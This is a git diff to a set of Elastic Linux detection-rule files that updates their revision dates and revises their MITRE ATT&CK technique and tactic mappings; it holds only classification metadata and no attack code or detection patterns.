[[transform.osquery]] @@ -205,6 +205,41 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["file.name", "process.name"] diff --git a/rules/linux/persistence_shell_configuration_modification.toml b/rules/linux/persistence_shell_configuration_modification.toml index 4fe83655166..36feba16bed 100644 --- a/rules/linux/persistence_shell_configuration_modification.toml +++ b/rules/linux/persistence_shell_configuration_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -152,3 +152,21 @@ reference = "https://attack.mitre.org/techniques/T1546/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml index 11e4f177db0..9594bb68dde 100644 --- a/rules/linux/persistence_simple_web_server_connection_accepted.toml +++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,48 +106,58 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" - [[rule.threat.technique]] - id = "T1505" - name = "Server Software Component" - reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" - [[rule.threat.technique.subtechnique]] - id = "T1505.003" - name = "Web Shell" - reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml index a36dadf7d26..2f6fa07ac43 100644 --- a/rules/linux/persistence_simple_web_server_creation.toml +++ b/rules/linux/persistence_simple_web_server_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,6 +141,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -154,6 +159,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml index d0ae0b7eb1f..3bbc6c7402b 100644 --- a/rules/linux/persistence_site_and_user_customize_file_creation.toml +++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,6 +153,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -165,3 +170,21 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.018" +name = "Python Startup Hooks" +reference = "https://attack.mitre.org/techniques/T1546/018/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml index bde9a2bb722..2edd7f1957b 100644 --- a/rules/linux/persistence_ssh_netcon.toml +++ b/rules/linux/persistence_ssh_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -146,6 +146,11 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml index cf09a455608..fae10f1ce11 100644 --- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml +++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,6 +101,16 @@ user.name:( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -119,11 +129,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" @@ -134,6 +139,28 @@ id = "T1564.002" name = "Hidden Users" reference = "https://attack.mitre.org/techniques/T1564/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "host.id"] diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml index a3db7c8cbe3..c78e14b4caf 100644 --- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml +++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,56 +96,89 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique.subtechnique]] id = "T1037.004" name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml index 793a712a67b..39876c5dc89 100644 --- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml +++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,3 +142,21 @@ reference = "https://attack.mitre.org/techniques/T1563/001/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml index 1405518b4e7..c652b183d85 100644 --- a/rules/linux/persistence_systemd_generator_creation.toml +++ b/rules/linux/persistence_systemd_generator_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,6 +138,11 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -156,6 +161,11 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml index 3d67cd46113..1df61713b44 100644 --- a/rules/linux/persistence_systemd_netcon.toml +++ b/rules/linux/persistence_systemd_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -171,3 +171,16 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_systemd_scheduled_timer_created.toml b/rules/linux/persistence_systemd_scheduled_timer_created.toml index 03c70b2ad08..ae8ceabfd9a 100644 --- a/rules/linux/persistence_systemd_scheduled_timer_created.toml +++ b/rules/linux/persistence_systemd_scheduled_timer_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/24" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -210,3 +210,21 @@ reference = "https://attack.mitre.org/techniques/T1053/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_systemd_service_creation.toml b/rules/linux/persistence_systemd_service_creation.toml index bce2f849d8f..73b4395f184 100644 --- a/rules/linux/persistence_systemd_service_creation.toml +++ b/rules/linux/persistence_systemd_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -249,21 +249,3 @@ reference = "https://attack.mitre.org/techniques/T1543/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml index 4d7bc96589f..8625e7ded90 100644 --- a/rules/linux/persistence_systemd_service_started.toml +++ b/rules/linux/persistence_systemd_service_started.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -233,6 +233,23 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml index 634b59f4e98..09970325b5c 100644 --- a/rules/linux/persistence_systemd_shell_execution.toml +++ b/rules/linux/persistence_systemd_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,3 +130,21 @@ reference = "https://attack.mitre.org/techniques/T1543/002/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 367963adfec..46957374175 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,3 +120,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index b1e5e98060a..da02eaa00c3 100644 --- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index b58e6b0f925..7466666b368 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,7 +138,30 @@ id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 6d45ba99f78..7fa0e51015b 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,6 +112,11 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" @@ -148,6 +153,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 1b804697747..f30d002710e 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,31 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 962c7bb3a3f..d465614ba7f 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,6 +89,16 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -102,11 +112,15 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 9acdc41ffa3..4c250cfc6c3 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,6 +77,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -128,6 +133,18 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_credential_modification_via_echo.toml b/rules/linux/persistence_user_credential_modification_via_echo.toml index 3ffcadfcb8d..f41a2cc786e 100644 --- a/rules/linux/persistence_user_credential_modification_via_echo.toml +++ b/rules/linux/persistence_user_credential_modification_via_echo.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1098/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 989aedbc3a6..7dd6db38297 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" 